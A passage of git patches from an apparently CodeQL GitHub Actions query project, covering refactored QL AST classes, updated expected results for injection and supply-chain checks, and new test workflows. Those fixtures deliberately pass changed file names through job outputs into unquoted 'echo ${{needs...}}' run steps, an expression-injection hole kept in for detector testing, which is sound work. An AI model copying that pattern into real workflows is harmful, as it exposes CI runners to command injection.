.github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -158,7 +158,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | @@ -176,13 +176,13 @@ subpaths | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | @@ -220,7 +220,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index 174f9d49e87..c26769a692e 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions | +| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 169d9c9ac2b..6620d2ac385 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,7 +1,7 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 76d47eec191..7527a1e15f2 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | From 6875640c6439aa6c4faa17f20af2ac43262cacfe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 10:33:26 +0100 Subject: [PATCH 0084/1267] Refactor getXXXExpr methods --- ql/lib/codeql/actions/Ast.qll | 54 +++++++++-------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../{inter-job.yml => inter-job0.yml} | 9 ++- .../CWE-094/.github/workflows/inter-job1.yml | 43 +++++++++++++ .../CWE-094/.github/workflows/inter-job2.yml | 45 ++++++++++++++ .../CWE-094/.github/workflows/inter-job4.yml | 44 ++++++++++++++ .../CWE-094/.github/workflows/inter-job5.yml | 45 ++++++++++++++ .../CriticalExpressionInjection.expected | 55 +++++++++++++---- .../CWE-094/ExpressionInjection.expected | 60 +++++++++++++++---- 9 files changed, 307 insertions(+), 50 deletions(-) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{inter-job.yml => inter-job0.yml} (85%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 096f3b9f803..89afd954d85 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -214,19 +214,20 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVariable(string name) { + StringLiteral getMatrixVar(string name) { super.lookup("matrix").(YamlMapping).lookup(name) = result } - string getAMatrixVariableName() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) - } + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode { +class Needs extends AstNode instanceof YamlMappingLikeNode { Job job; Needs() { job.(YamlMapping).lookup("needs") = this } @@ -234,16 +235,18 @@ class Needs extends AstNode { Job getJob() { result = job } Job getANeededJob() { - if this instanceof YamlString - then - result.getId() = this.(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else none() + result.getId() = super.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + // if this instanceof YamlString + // then + // result.getId() = this.(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else + // if this instanceof YamlSequence + // then + // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else none() } } @@ -583,29 +586,30 @@ class StepsExpression extends ContextExpression { * e.g. `${{ needs.job1.outputs.foo}}` */ class NeedsExpression extends ContextExpression { - Job job; - string jobId; + Job neededJob; + string neededJobId; string fieldName; NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and - jobId = expr.regexpCapture(needsCtxRegex(), 1) and + neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and - job.getId() = jobId + neededJob.getId() = neededJobId } - predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } override string getFieldName() { result = fieldName } override AstNode getTarget() { - job.getLocation().getFile() = this.getLocation().getFile() and + neededJob.getLocation().getFile() = this.getLocation().getFile() and + this.getJob().getANeededJob() = neededJob and ( // regular jobs - job.getOutputs() = result + neededJob.getOutputs() = result or // reusable workflow calling jobs - job.getUses() = result + neededJob.getUses() = result ) } } @@ -701,12 +705,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariable(fieldName) = result and + w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariable(fieldName) = result and + j.getStrategy().getMatrixVar(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index d64c91f7bb7..6015e6336ca 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariable(_) and l = child.getLocation() + child = super.getAMatrixVar() and l = child.getLocation() | child order by diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml similarity index 85% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 2760a6c3d35..5ad00b17db9 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,6 +1,13 @@ -on: push +jn: push jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + job1: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml new file mode 100644 index 00000000000..4f149a92041 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: [job0, job1] + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml new file mode 100644 index 00000000000..21fa789d9e7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -0,0 +1,45 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml new file mode 100644 index 00000000000..aad2d171c1a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -0,0 +1,44 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml new file mode 100644 index 00000000000..d6b7b2b1b0c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -0,0 +1,45 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + + steps: + - id: sink + # Should not be reported since job1 is not needed + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dacd31cf91c..9d00212e3af 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | 